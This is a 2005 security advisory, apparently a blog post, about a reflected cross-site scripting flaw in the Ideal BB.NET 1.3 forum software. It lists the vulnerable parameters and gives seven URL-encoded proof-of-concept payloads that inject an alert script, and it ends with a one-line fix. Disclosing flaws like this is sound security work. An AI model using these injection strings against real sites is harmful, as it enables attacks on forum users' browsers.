by r0t,der4444,cembo,VietMafia

Tuesday, December 06, 2005

Ideal BB.NET 1.3 XSS vuln

Ideal BB.NET 1.3 XSS vuln
Vuln. dicovered by : r0t
Date: 6 dec. 2005
vendor:www.idealscience.com/site/products/idealbb.net.aspx
affected version: 1.3 and prior

Product Description:
It is a powerful bulletin board program designed to run on the Microsoft .NET framework. It uses Windows technologies and Microsoft SQL server to provide the most powerful bulletin board experience. It offers unparalleled customization options and the most scalable features of any Windows based bulletin board system to date.

Vuln. Description:
Ideal BB.NET contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "forumID" "boardID" "postID" "catID" "memberID" in to paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


few examples:

/topics.aspx?forumID=59%22%3E%3Cscript%3Ealer
t('r0t')%3C/script%3E

/categoryindex.aspx?boardID=1%22%3E%3Cscript%3
Ealert('r0t')%3C/script%3E

/topics.aspx?date=12/05/2005&boardID=1%22%3E%
3Cscript%3Ealert('r0t')%3C/script%3E

/posts.aspx?postID=%22%3E%3Cscript%3Ealert(
'r0t')%3C/script%3E

/forums.aspx?catID=%22%3E%3Cscript%3Ealert(
'r0t')%3C/script%3E

/member.aspx?memberID=%22%3E%3Cscript%3Eal
ert('r0t')%3C/script%3E

/topics.aspx?forumID=54&topicRepeater1-p=
%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

Solution:
Edit the source code to ensure that input is properly sanitised.

0 Comments:

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew